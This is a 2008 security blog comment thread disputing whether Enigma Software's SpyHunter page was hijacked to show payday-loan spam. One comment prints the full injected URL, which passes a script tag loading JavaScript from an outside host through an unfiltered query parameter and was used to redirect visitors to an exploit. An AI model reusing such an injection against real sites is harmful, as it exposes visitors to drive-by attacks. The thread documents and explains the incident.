I have no doubt there will be more to follow… Stay tuned.
Enigma software, have they been spoofed
Older post: Enigma of enigma software
Newer post: KvmSecure Rogue Security Program
Consumer Security on the web, information to assist you in practicing safe computing
-
-
-
This work by http://certifiedbug.com/blog/ is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 Unported LicenseQuoted material is © of original author
-
{ 1 trackback }
{ 22 comments }
Enigma Software Group USA, LLC 05.22.08 at 12:41 pm
You are spreading false rumors on your site
This image is a fake that was made with the sole intent to damage our reputation.
http://certifiedbug.com/blog/wp-content/enigmasoftware4.png
Enigma Software Group USA, LLC 05.22.08 at 12:45 pm
Enigma is not in the credit business and Enigma has not been spoofed, and there are false statements and images on this webpage http://certifiedbug.com/blog/2008/05/21/enigmasoftware-payday-loan/. There are images suggesting to readers of your site that our web site and servers have been compromised. And that our software is scanning for bad credit and offering pay day loans. The image suggesting that SpyHunter will scan the Entire computer to detect negative credit is a fake image. It was never on our servers.
Fake Image URL: http://certifiedbug.com/blog/wp-content/enigmasoftware4.png
As far as the URL and title referenced in the article. Our pages are dynamically generated, where you can pass parameters and the page will have the title and other keywords based on the querystring keyword or phrase passthrought it. For example, in the page you are describing http://www.enigmasoftware.com/spyhunter_more_info.php?n=?n=xxxx will change the content inside the title tags xxxx. This is a common practice in most dynmaically generated content on most content management systems.
Someone created an account on a china expatriate forum that made only one post with a link on this page http://www.alloexpat.com/china_expat_forum/member56188.html to a non-existent page on our server which was then dynamically generated. The page, which subsequently showed up in Google. Has text relating to Payday Loans.
This whole situation then became blown out of proportion with someone under the alias of JeanInMontana making accusations that we are using data that we collect for phishing and Spam. These accusations are false and entirely basesless.
Enigma Software Group USA, LLC is not in the loan business.
certifiedbug 05.22.08 at 1:16 pm
On the contrary, this site was spammed with links to the site from which I took the screenshots yesterday.
Which is why I wondered if the site had been spoofed.
I see the exact same links now redirect to a legitimate page.
ShadowPuterDude 05.22.08 at 1:19 pm
Google is your friend
hxxp://www.google.com/search?hl=enamp q=%22
Scan+your+entire+computer+to+detect+negative+credit+
-+Payday+loan&btnG=Search
Sorry, Enigma Software Group USA, LLC; but the fact is your page did say that until recently.
Steven 05.22.08 at 1:23 pm
Trust me, you don’t need us to damage your reputation - ESG do that all by themselves ……..
And nope, the image is NOT a fake …… many of us witnessed the same thing. All you have done, to prevent this being seen, is fix the bug in your site, that allowed script injection.
Previously, someone had attempted to redirect victims to an exploit, via your website. Since your site was not correctly filtering HTML codes, the following with Javascript disabled, displayed what is shown in the screenshot shown by CB, and with JS enabled, took the victim to the exploit;
hxxx://www.enigmasoftware.com/spyhunter_more_info.php?n=negative%20credit%20-%20Payday%20loan
%20-%20Up%20to%202500$%20Next%20day%20in%20your%20Bank
%20account%20payday%20loan%3Cscript
%20src=http://cmiia.com/o9.js%3E%3C/script%3E
Since you’ve fixed this, it now correctly leads to;
spyhunter_more_info.php
We’re not stupid Alvin ;o)
Alvin Estevez 05.22.08 at 2:36 pm
“Trust me, you don’t need us to damage your reputation - ESG do that all by themselves”
Steven, I remember you from other conversations, that is your opinion and irrelevant to what we are discussing. We are aware of your opinions on us. Our loyal customers do that share your opinion. I think your issue with us is almost like a personal obsession. I would advise to please let’s stick to the issues. For example, the issue of the page with the exploited querystring (n=…..) Let’s address that.
Enigma Software Group USA, LLC 05.22.08 at 2:39 pm
You are correct the page was there. It was simply what we had previously stated
Enigma landing pages are dynamically generated, where you can pass parameters and the page will have the title and other keywords based on the querystring keyword or phrase passed through to it. For example, in the page you are describing http://www.enigmasoftware.com/spyhunter_more_info.php?n=xxxx will change the content inside the title tags xxxx. This is a common practice in most dynmaically generated content on most content management systems.
Someone started spamming links on sites such as china expatriate forum (http://www.alloexpat.com/china_expat_forum/member56188.html ) to an invalid URL on our server which was then dynamically generated. The page, which subsequently showed up in Google had text relating to Payday Loans. This is not our business and never was nor are we interested in it.
certifiedbug 05.22.08 at 2:44 pm
The site I was at when I took the screenshots had a problem, (for whatever reason), it obviously appears to be corrected now.
The same spammer who posted the link originally did it again today.
Alvin Estevez 05.22.08 at 2:55 pm
ShadowPuterDude,
“Sorry, Enigma Software Group USA, LLC; but the fact is your page did say that until recently.”
The bottom-line:
As I stated before, that page had a parameter that was exploited by that forum poster who linked to the page knowing that the page will display on the title and the body whatever he or she wanted to display.
By no means that was a server level spoof. That was simply exploiting the known (n=…) querystring to manipulate the page.
We have no interest in the credit or loan business….
Anybody could have exploited that link into anything they wanted to exploited for…. We have corrected the problem as soon as my technical team became aware that they were doing it.
Alvin Estevez 05.22.08 at 3:01 pm
Certifiedbug , we will investigate who is this forum spammer who has it in for us.. He or she will not be able to exploit that querystring anymore. We are exploring our options with our legal counsel.
certifiedbug 05.22.08 at 3:12 pm
Do you want the spammer’s IP Alvin Estevez.
Paperghost 05.22.08 at 3:25 pm
Alvin, I have updated my blog post to say that despite the statement in the article I linked to which claims Enigma has changed its name, you have posted to confirm otherwise.
As for the above issue of the spammer and potential exploit redirection, would it not be beneficial in this case to work with Tashi with regards tracking down and shutting down the spammers if at all possible? It seems to me bringing this issue to light has actually been beneficial to yourselves in terms of both making you aware of it, and also giving you the chance to take action to shut this person down completely. Just a thought
Alvin Estevez 05.22.08 at 3:40 pm
PaperGhost,
I wanted to speak to you on the Anti-Spyware Coalition consortium meeting last January of this year.
I was sitting in the audience and enjoyed some of the work you do with the young hackers.
I am willing to work with Tashi to find those spammers.
My only issue is, the IP can be bogus, what if they are using proxies or compromised computers? But at least is a starting point….
Alvin
Alvin Estevez 05.22.08 at 3:44 pm
Paperghost,
Is there a way for us to speak to you in private?
Alvin
Paperghost 05.22.08 at 3:59 pm
Email me at Paperghost@vitalsecurity.org is the quickest way. Its late here, but I will wait up for your message
ShadowPuterDude 05.22.08 at 4:16 pm
Alvin,
I am quite familiar with Content Management Systems and dynamically generated web pages.
Some person or persons have taken advantage of a vulnerability in your software and exploited it. You have since corrected the vulnerability to prevent code injection.
That doesn’t change the fact that some one from your company falsely accused certifiedbug of posting fake images and spreading false rumors. Those pages did exist, with the content displayed; as posted in the article. I’ve seen them, 4 pages, including spyhunter_more_info.php.
Be thankful that the malicious redirect,was ineffective. I’ve been to the redirect, to investigate. I won’t discuss the particulars of the attempted exploit in an open discussion that anyone, including the perpetrators, can view.
Alvin Estevez 05.22.08 at 4:37 pm
ShadowPuterDude,
Do not post it here.. But what 4 other pages are exposed? and How can we communicate privately to discuss the particulars?
Thanks,
Alvin
Alvin Estevez 05.22.08 at 4:53 pm
ShadowPuterDude,
“Some person or persons have taken advantage of a vulnerability in your software and exploited it.”
It was not my “Software” that was exploited, it was simply the page or pages to be exact.
Alvin
ShadowPuterDude 05.22.08 at 5:33 pm
Alvin,
You can contact me at spd@malwareks.com, and I’ll give you the information I have.
If you use the vulnerable code on other pages, you’ll will want to review your code, and notify the author of the CMS, you use, of the code injection vulnerability.
ShadowPuterDude 05.22.08 at 6:47 pm
Correcting my miss-typed email addy: spd@malwareteks.com
bonzo 08.11.08 at 2:29 pm
While looking for a cure for XP Antivirus 2008 I found www.wiki-security.com. Except for no search function, it’s a pretty legitimate looking AV site. The weird thing is that every page has a download link for SpyHunter. It’s like some sort of covert ad for SpyHunter. The weirder thing is that when I clicked on a link to download the “free” software it’s blocked by our AV firewall tagging it as W32.JAKUZ, a known keylogger (Kaspersky).
certifiedbug 08.11.08 at 6:46 pm
Hello bonzo,
I tested the download with two different AV’s, niether alerted.
What do you mean by “our AV firewall” ?
Search on W32.JAKUZ at Kaspersky.
Comments on this entry are closed.